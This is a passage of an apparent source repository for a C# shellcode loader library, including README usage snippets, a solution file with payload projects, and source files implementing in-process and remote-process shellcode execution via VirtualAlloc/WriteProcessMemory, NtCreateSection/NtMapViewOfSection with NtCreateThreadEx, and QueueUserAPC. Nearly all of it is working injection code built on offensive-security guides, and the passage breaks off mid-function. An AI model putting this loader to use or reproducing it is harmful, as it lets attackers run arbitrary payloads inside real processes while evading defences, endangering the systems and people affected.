42 | ```
43 | ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(Target, PayloadCpp64.rawData);
44 | cpp.LoadWithNtMapView();
45 | cpp.Dispose();
46 | ```
47 |
48 | QueueAPC:
49 |
50 | ```
51 | ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp64.rawData);
52 | cpp.LoadWithQueueAPC();
53 | cpp.Dispose();
54 | ```
55 |
56 | Minimal API:
57 |
58 | ```
59 | ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp64.rawData);
60 | cpp.Asynchronous = true;// false otherwise
61 | cpp.LoadWithMinimalAPI();
62 | cpp.Dispose();
63 | ```
64 |
65 | Includes :
66 |
67 | * Asynchronous (a simple Task.Run to not block main thread)
68 | * Loading with Kernel32
69 | * Loading with NtDll
70 | * NtDll : NtAllocateVirtualMemory
71 | * NtDll : NtWriteVirtualMemory
72 | * NtDll : NtProtectVirtualMemory
73 | * NtDll : NtFreeVirtualMemory
74 | * NtDll : NtCreateThreadEx
75 | * NtDll : NtCreateSection
76 | * NtDll : NtMapViewOfSection
77 | * NtDll : NtTestAlert
78 | * Kernel32 : GetCurrentProcess
79 | * Kernel32 : VirtualAlloc
80 | * Kernel32 : VirtualAllocEx
81 | * Kernel32 : VirtualFree
82 | * Kernel32 : VirtualProtect
83 | * Kernel32 : VirtualProtectEx
84 | * Kernel32 : WriteProcessMemory
85 | * Kernel32 : CreateRemoteThread
86 | * Kernel32 : GetModuleHandle
87 | * Kernel32 : GetProcAddress
88 | * Kernel32 : QueueUserAPC
89 | * Kernel32 : SleepEx
90 | * Enumeration : PageProtection
91 | * Enumeration : TypeAlloc
92 | * Enumeration: FreeType
93 | * Enumeration : SectionAccess
94 | * Enumeration : MappingAttributes
95 | * Delegates : all functions have been written with delegate style except GetModuleHandle and GetProcAddress
96 |
97 | TODO :
98 | * Inject shellcode in another process with VirtualEx and NtEx functions
99 | * Check if shellcode is 64 or 32 bit before injection
100 | * Check if dll (kernel32, ntdll) have been loaded
101 |
102 | Known :
103 | * Debugging 32 bit test injection involves PInvokeStackImbalance
104 |
--------------------------------------------------------------------------------
/ShellCodeLoader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.0.31919.166
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellCodeLoader", "ShellCodeLoader\ShellCodeLoader.csproj", "{B2A57A97-4D88-4942-A4B3-06AA466080F2}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Test", "Test\Test.csproj", "{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PayloadCpp", "PayloadCpp\PayloadCpp.vcxproj", "{05027976-CAC5-447F-84B6-77F38AF2566C}"
11 | EndProject
12 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PayloadCSharp", "PayloadCSharp\PayloadCSharp.csproj", "{485173CC-FE2B-423B-81F6-EC812DBD6DF3}"
13 | EndProject
14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PayloadCpp2", "PayloadCpp2\PayloadCpp2.vcxproj", "{B37B4EBE-E126-4C34-9A1B-1526697C2C25}"
15 | EndProject
16 | Global
17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
18 | Debug|Any CPU = Debug|Any CPU
19 | Debug|x64 = Debug|x64
20 | Debug|x86 = Debug|x86
21 | Release|Any CPU = Release|Any CPU
22 | Release|x64 = Release|x64
23 | Release|x86 = Release|x86
24 | EndGlobalSection
25 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
26 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
27 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.Build.0 = Debug|Any CPU
28 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.ActiveCfg = Release|Any CPU
29 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.Build.0 = Release|Any CPU
30 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.ActiveCfg = Debug|Any CPU
31 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.Build.0 = Debug|Any CPU
32 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|Any CPU.ActiveCfg = Release|Any CPU
33 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|Any CPU.Build.0 = Release|Any CPU
34 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x64.ActiveCfg = Release|Any CPU
35 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x64.Build.0 = Release|Any CPU
36 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x86.ActiveCfg = Release|Any CPU
37 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x86.Build.0 = Release|Any CPU
38 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
39 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.Build.0 = Debug|Any CPU
40 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|Any CPU
41 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|Any CPU
42 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.ActiveCfg = Debug|Any CPU
43 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.Build.0 = Debug|Any CPU
44 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Release|x64
45 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.Build.0 = Release|x64
46 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.ActiveCfg = Release|x64
47 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.Build.0 = Release|x64
48 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.ActiveCfg = Release|Any CPU
49 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.Build.0 = Release|Any CPU
50 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|Any CPU.ActiveCfg = Debug|Win32
51 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.ActiveCfg = Debug|Win32
52 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.Build.0 = Debug|Win32
53 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.ActiveCfg = Debug|Win32
54 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.Build.0 = Debug|Win32
55 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Release|Any CPU.ActiveCfg = Release|x64
56 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Release|x64.ActiveCfg = Release|x64
57 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Release|x64.Build.0 = Release|x64
58 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Release|x86.ActiveCfg = Release|Win32
59 | {05027976-CAC5-447F-84B6-77F38AF2566C}.Release|x86.Build.0 = Release|Win32
60 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
61 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Debug|Any CPU.Build.0 = Debug|Any CPU
62 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Debug|x64.ActiveCfg = Debug|Any CPU
63 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Debug|x64.Build.0 = Debug|Any CPU
64 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Debug|x86.ActiveCfg = Debug|Any CPU
65 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Debug|x86.Build.0 = Debug|Any CPU
66 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Release|Any CPU.ActiveCfg = Release|x64
67 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Release|Any CPU.Build.0 = Release|x64
68 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Release|x64.ActiveCfg = Release|Any CPU
69 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Release|x64.Build.0 = Release|Any CPU
70 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Release|x86.ActiveCfg = Release|Any CPU
71 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}.Release|x86.Build.0 = Release|Any CPU
72 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Debug|Any CPU.ActiveCfg = Debug|Win32
73 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Debug|x64.ActiveCfg = Debug|x64
74 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Debug|x64.Build.0 = Debug|x64
75 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Debug|x86.ActiveCfg = Debug|Win32
76 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Debug|x86.Build.0 = Debug|Win32
77 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Release|Any CPU.ActiveCfg = Release|Win32
78 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Release|x64.ActiveCfg = Release|x64
79 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Release|x64.Build.0 = Release|x64
80 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Release|x86.ActiveCfg = Release|Win32
81 | {B37B4EBE-E126-4C34-9A1B-1526697C2C25}.Release|x86.Build.0 = Release|Win32
82 | EndGlobalSection
83 | GlobalSection(SolutionProperties) = preSolution
84 | HideSolutionNode = FALSE
85 | EndGlobalSection
86 | GlobalSection(ExtensibilityGlobals) = postSolution
87 | SolutionGuid = {B998DA35-8161-45C6-97FA-6150295262FD}
88 | EndGlobalSection
89 | EndGlobal
90 |
--------------------------------------------------------------------------------
/ShellCodeLoader/MapView.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32.SafeHandles;
2 | using System;
3 | using System.Diagnostics;
4 | using System.Runtime.InteropServices;
5 | using static ShellCodeLoader.Shared;
6 | /*
7 | || AUTHOR Arsium ||
8 | || github : https://github.com/arsium ||
9 | || Please let this credit for all the time I worked on ||
10 | || Guide & Inspirations : https://www.ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection
11 | */
12 | namespace ShellCodeLoader
13 | {
14 | public class MapView : IDisposable
15 | {
16 | private byte[] ShellCode;
17 | private uint RegionSize;
18 | private Process Target;
19 | public MapView(Process target, byte[] shellCode)
20 | {
21 | this.ShellCode = shellCode;
22 | this.RegionSize = (uint)shellCode.Length;
23 | this.Target = target;
24 | }
25 |
26 | public MapView(byte[] shellCode)
27 | {
28 | this.ShellCode = shellCode;
29 | this.RegionSize = (uint)shellCode.Length;
30 | this.Target = Process.GetCurrentProcess();
31 | }
32 |
33 | public void LoadWithNtMapView()
34 | {
35 | NtMapView();
36 | }
37 |
38 | private void NtMapView()
39 | {
40 | IntPtr hSectionHandle = IntPtr.Zero;
41 | Imports.NtCreateSection(ref hSectionHandle, Imports.SectionAccess.SECTION_ALL_ACCESS, IntPtr.Zero, ref RegionSize, PageProtection.PAGE_EXECUTE_READWRITE, Imports.MappingAttributes.SEC_COMMIT, IntPtr.Zero);
42 |
43 |
44 | IntPtr pLocalView = IntPtr.Zero;
45 | UInt64 localOffset = 0;
46 | Imports.NtMapViewOfSection(hSectionHandle, Process.GetCurrentProcess().Handle, ref pLocalView, UIntPtr.Zero, UIntPtr.Zero, ref localOffset, ref RegionSize, Imports.VIEWUNMAP, 0, PageProtection.PAGE_READWRITE);
47 |
48 |
49 | UInt64 remoteOffset = 0;
50 | IntPtr pRemoteView = IntPtr.Zero;
51 | Imports.NtMapViewOfSection(hSectionHandle, Target.Handle, ref pRemoteView, UIntPtr.Zero, UIntPtr.Zero, ref remoteOffset, ref RegionSize, Imports.VIEWUNMAP, 0, PageProtection.PAGE_EXECUTE_READ);
52 |
53 |
54 | UIntPtr bytesWritten;
55 | Imports.NtWriteVirtualMemory(Process.GetCurrentProcess().Handle, pLocalView, ShellCode, (UIntPtr)RegionSize, out bytesWritten);
56 |
57 |
58 | IntPtr hThread = IntPtr.Zero;
59 | Imports.NtCreateThreadEx(ref hThread, AccessMask.GENERIC_EXECUTE, IntPtr.Zero, Target.Handle, pRemoteView, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
60 | }
61 |
62 | private static class Imports
63 | {
64 | internal const String KERNEL32 = "kernel32.dll";
65 | internal const String NTDLL = "ntdll.dll";
66 | internal const UInt32 VIEWUNMAP = 0x2;
67 |
68 |
69 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
70 | public static extern uint NtCreateSection(ref IntPtr SectionHandle, SectionAccess DesiredAccess, IntPtr ObjectAttributes, ref uint MaximumSize, PageProtection SectionPageProtection, MappingAttributes AllocationAttributes, IntPtr FileHandle);
71 |
72 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
73 | public static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, ref UInt64 SectionOffset, ref uint ViewSize, uint InheritDisposition, UInt32 AllocationType, PageProtection Win32Protect);
74 |
75 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
76 | public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
77 |
78 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
79 | public static extern uint NtCreateThreadEx(ref IntPtr threadHandle, AccessMask desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList);
80 |
81 |
82 | [Flags]
83 | public enum SectionAccess : uint
84 | {
85 | SECTION_EXTEND_SIZE = 0x0010,
86 | SECTION_QUERY = 0x0001,
87 | SECTION_MAP_WRITE = 0x0002,
88 | SECTION_MAP_READ = 0x0004,
89 | SECTION_MAP_EXECUTE = 0x0008,
90 | SECTION_ALL_ACCESS = 0xe
91 | }
92 |
93 | [Flags]
94 | public enum MappingAttributes : uint
95 | {
96 | SEC_COMMIT = 0x8000000,
97 | SEC_IMAGE = 0x1000000,
98 | SEC_IMAGE_NO_EXECUTE = 0x11000000,
99 | SEC_LARGE_PAGES = 0x80000000,
100 | SEC_NOCACHE = 0x10000000,
101 | SEC_RESERVE = 0x4000000,
102 | SEC_WRITECOMBINE = 0x40000000
103 | }
104 | }
105 |
106 | private bool _disposed = false;
107 |
108 | // Instantiate a SafeHandle instance.
109 | private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
110 |
111 | // Public implementation of Dispose pattern callable by consumers.
112 | public void Dispose() => Dispose(true);
113 |
114 | // Protected implementation of Dispose pattern.
115 | protected virtual void Dispose(bool disposing)
116 | {
117 | if (_disposed)
118 | {
119 | return;
120 | }
121 |
122 | if (disposing)
123 | {
124 | // Dispose managed state (managed objects).
125 | _safeHandle?.Dispose();
126 | }
127 |
128 | _disposed = true;
129 | GC.SuppressFinalize(this);
130 | }
131 | }
132 | }
133 |
--------------------------------------------------------------------------------
/ShellCodeLoader/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Les informations générales relatives à un assembly dépendent de
6 | // l'ensemble d'attributs suivant. Changez les valeurs de ces attributs pour modifier les informations
7 | // associées à un assembly.
8 | [assembly: AssemblyTitle("ShellCodeLoader")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellCodeLoader")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // L'affectation de la valeur false à ComVisible rend les types invisibles dans cet assembly
18 | // aux composants COM. Si vous devez accéder à un type dans cet assembly à partir de
19 | // COM, affectez la valeur true à l'attribut ComVisible sur ce type.
20 | [assembly: ComVisible(false)]
21 |
22 | // Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM
23 | [assembly: Guid("b2a57a97-4d88-4942-a4b3-06aa466080f2")]
24 |
25 | // Les informations de version pour un assembly se composent des quatre valeurs suivantes :
26 | //
27 | // Version principale
28 | // Version secondaire
29 | // Numéro de build
30 | // Révision
31 | //
32 | // Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut
33 | // en utilisant '*', comme indiqué ci-dessous :
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ShellCodeLoader/QueueAPC.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32.SafeHandles;
2 | using System;
3 | using System.Diagnostics;
4 | using System.Runtime.InteropServices;
5 | using System.Threading;
6 | using static ShellCodeLoader.Shared;
7 | /*
8 | || AUTHOR Arsium ||
9 | || github : https://github.com/arsium ||
10 | || Please let this credit for all the time I worked on ||
11 | || Guide & Inspirations : https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection
12 | */
13 | namespace ShellCodeLoader
14 | {
15 | public class QueueAPC : IDisposable
16 | {
17 |
18 | private byte[] ShellCode;
19 | private uint RegionSize;
20 | private Process Target;
21 | private bool NewThread;
22 |
23 | public QueueAPC(byte[] shellCode, bool newThread = false)
24 | {
25 | this.ShellCode = shellCode;
26 | this.RegionSize = (uint)shellCode.Length;
27 | this.Target = Process.GetCurrentProcess();
28 | this.NewThread = newThread;
29 | }
30 | private unsafe void CallBackQueueUserAPC(void* param)
31 | {
32 | IntPtr ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, Shared.PageProtection.PAGE_EXECUTE_READWRITE);
33 |
34 | UIntPtr writtenBytes;
35 | Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
36 |
37 | PageProtection flOld;
38 | Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READWRITE, out flOld);
39 |
40 | ShellCodeCaller s = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
41 | s();
42 | }
43 |
44 | private unsafe void QueueUserAPC()
45 | {
46 | if (NewThread)
47 | {
48 | new Thread(() =>
49 | {
50 | //https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
51 | Imports.CallBack s = new Imports.CallBack(CallBackQueueUserAPC); //set our callback for APC (the callback is a classic shellcode loader
52 |
53 | Imports.QueueUserAPC(s, Imports.GetCurrentThread(), IntPtr.Zero); //add apc to our thread
54 |
55 | //Imports.SleepEx(0, true); //now we have to set an alertable for our thread : https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls
56 | Imports.NtTestAlert(); //empty APC queue for the current thread
57 |
58 | }).Start();
59 | }
60 | else
61 | {
62 | //https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
63 | Imports.CallBack s = new Imports.CallBack(CallBackQueueUserAPC); //set our callback for APC (the callback is a classic shellcode loader
64 |
65 | Imports.QueueUserAPC(s, Imports.GetCurrentThread(), IntPtr.Zero); //add apc to our thread
66 |
67 | //Imports.SleepEx(0, true); //now we have to set an alertable for our thread : https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls
68 | Imports.NtTestAlert(); //empty APC queue for the current thread
69 | }
70 | }
71 |
72 | public void LoadWithQueueAPC()
73 | {
74 | QueueUserAPC();
75 | }
76 |
77 | private static class Imports
78 | {
79 | internal const String KERNEL32 = "kernel32.dll";
80 | internal const String NTDLL = "ntdll.dll";
81 |
82 |
83 | public unsafe delegate void CallBack(void* param);
84 | public delegate void ShellCodeCaller();
85 |
86 |
87 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
88 | public static unsafe extern uint QueueUserAPC(CallBack pFunction, IntPtr tHandle, IntPtr dwData);
89 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
90 | public static unsafe extern uint SleepEx(uint dwMilliseconds, bool bAlertable);
91 | [DllImport(NTDLL, SetLastError = true)]
92 | public static extern uint NtTestAlert();
93 |
94 |
95 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
96 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
97 |
98 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
99 | public static extern IntPtr VirtualAllocEx(IntPtr procHandle, IntPtr address, IntPtr numBytes, Shared.TypeAlloc commitOrReserve, Shared.PageProtection pageProtectionMode);
100 |
101 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
102 | public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, Shared.PageProtection flNewProtect, out Shared.PageProtection lpflOldProtect);
103 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
104 | public static extern IntPtr GetCurrentThread();
105 | }
106 |
107 | private bool _disposed = false;
108 |
109 | // Instantiate a SafeHandle instance.
110 | private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
111 |
112 | // Public implementation of Dispose pattern callable by consumers.
113 | public void Dispose() => Dispose(true);
114 |
115 | // Protected implementation of Dispose pattern.
116 | protected virtual void Dispose(bool disposing)
117 | {
118 | if (_disposed)
119 | {
120 | return;
121 | }
122 |
123 | if (disposing)
124 | {
125 | // Dispose managed state (managed objects).
126 | _safeHandle?.Dispose();
127 | }
128 |
129 | _disposed = true;
130 | GC.SuppressFinalize(this);
131 | }
132 | }
133 | }
134 |
--------------------------------------------------------------------------------
/ShellCodeLoader/Shared.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | /*
4 | || AUTHOR Arsium ||
5 | || github : https://github.com/arsium ||
6 | || Please let this credit for all the time I worked on ||
7 | */
8 | namespace ShellCodeLoader
9 | {
10 | internal class Shared
11 | {
12 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
13 | internal delegate void ShellCodeCaller();
14 |
15 | [Flags]
16 | internal enum TypeAlloc : uint
17 | {
18 | MEM_COMMIT = 0x00001000,
19 | MEM_RESERVE = 0x00002000,
20 | MEM_RESET = 0x00080000,
21 | MEM_RESET_UNDO = 0x1000000,
22 | MEM_LARGE_PAGES = 0x20000000,
23 | MEM_PHYSICAL = 0x00400000,
24 | MEM_TOP_DOWN = 0x00100000,
25 | MEM_WRITE_WATCH = 0x00200000
26 | }
27 |
28 | [Flags]
29 | internal enum FreeType : uint
30 | {
31 | MEM_DECOMMIT = 0x00004000,
32 | MEM_RELEASE = 0x00008000,
33 | MEM_COALESCE_PLACEHOLDERS = 0x00000001,
34 | MEM_PRESERVE_PLACEHOLDER = 0x00000002
35 | }
36 |
37 | [Flags]
38 | internal enum PageProtection : uint
39 | {
40 | PAGE_EXECUTE = 0x10,
41 | PAGE_EXECUTE_READ = 0x20,
42 | PAGE_EXECUTE_READWRITE = 0x40,
43 | PAGE_EXECUTE_WRITECOPY = 0x80,
44 | PAGE_NOACCESS = 0x01,
45 | PAGE_READONLY = 0x02,
46 | PAGE_READWRITE = 0x04,
47 | PAGE_WRITECOPY = 0x08,
48 | PAGE_TARGETS_INVALID = 0x40000000,
49 | PAGE_TARGETS_NO_UPDATE = 0x40000000,
50 | PAGE_GUARD = 0x100,
51 | PAGE_NOCACHE = 0x200,
52 | PAGE_WRITECOMBINE = 0x400
53 | }
54 |
55 | [Flags]
56 | internal enum AccessMask : uint
57 | {
58 | GENERIC_READ = 0x80000000,
59 | GENERIC_WRITE = 0x40000000,
60 | GENERIC_EXECUTE = 0x20000000,
61 | GENERIC_ALL = 0x10000000
62 | }
63 | }
64 | }
65 |
--------------------------------------------------------------------------------
/ShellCodeLoader/ShellCodeLoader.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Threading;
4 | using System.Threading.Tasks;
5 | using Microsoft.Win32.SafeHandles;
6 | using static ShellCodeLoader.Shared;
7 | /*
8 | || AUTHOR Arsium ||
9 | || github : https://github.com/arsium ||
10 | || Please let this credit for all the time I worked on ||
11 | */
12 | namespace ShellCodeLoader
13 | {
14 |
15 | public class ShellCodeLoader : IDisposable
16 | {
17 | private byte[] ShellCode;
18 | private IntPtr ptr;
19 | private uint RegionSize;
20 | ///
21 | /// Default is false.
22 | ///
23 | public bool Asynchronous { get; set; }
24 |
25 | public ShellCodeLoader(byte[] shellCode)
26 | {
27 | this.ShellCode = shellCode;
28 | this.RegionSize = (uint)shellCode.Length;
29 | this.ptr = IntPtr.Zero;
30 | this.Asynchronous = false;
31 | }
32 |
33 | public void LoadWithNT()
34 | {
35 | if (this.Asynchronous)
36 | {
37 | Task.Factory.StartNew(() => { NT(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
38 | //Replace Task.Run with Task.Factory.StartNew for .net 4
39 | /*Task.Run(() =>
40 | {
41 | NT();
42 | });*/
43 | }
44 | else
45 | {
46 | NT();
47 | }
48 | }
49 |
50 | public void LoadWithKernel32()
51 | {
52 | if (this.Asynchronous)
53 | {
54 | Task.Factory.StartNew(() => { Kernel32(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
55 | }
56 | else
57 | {
58 | Kernel32();
59 | }
60 | }
61 |
62 | public void LoadWithNTDelegates()
63 | {
64 | if (this.Asynchronous)
65 | {
66 | Task.Factory.StartNew(() => { NTDelegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
67 |
68 | }
69 | else
70 | {
71 | NTDelegates();
72 | }
73 | }
74 |
75 | public void LoadWithKernel32Delegates()
76 | {
77 | if (this.Asynchronous)
78 | {
79 | Task.Factory.StartNew(() => { Kernel32Delegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
80 | }
81 | else
82 | {
83 | Kernel32Delegates();
84 | }
85 | }
86 |
87 | private void NT()
88 | {
89 | Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
90 |
91 | UIntPtr bytesWritten;
92 | Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
93 |
94 | PageProtection flOld = new PageProtection();
95 | Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
96 |
97 | ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
98 | load();
99 |
100 | Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, FreeType.MEM_RELEASE);
101 | }
102 |
103 | private void Kernel32()
104 | {
105 | this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
106 |
107 | UIntPtr writtenBytes;
108 | Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
109 |
110 | PageProtection flOld;
111 | Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
112 |
113 | ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
114 | load();
115 |
116 | Imports.VirtualFree(ptr, (uint)0, FreeType.MEM_RELEASE);
117 | }
118 |
119 | private void NTDelegates()
120 | {
121 | IntPtr ExportedNtAllocateVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtAllocateVirtualMemory");
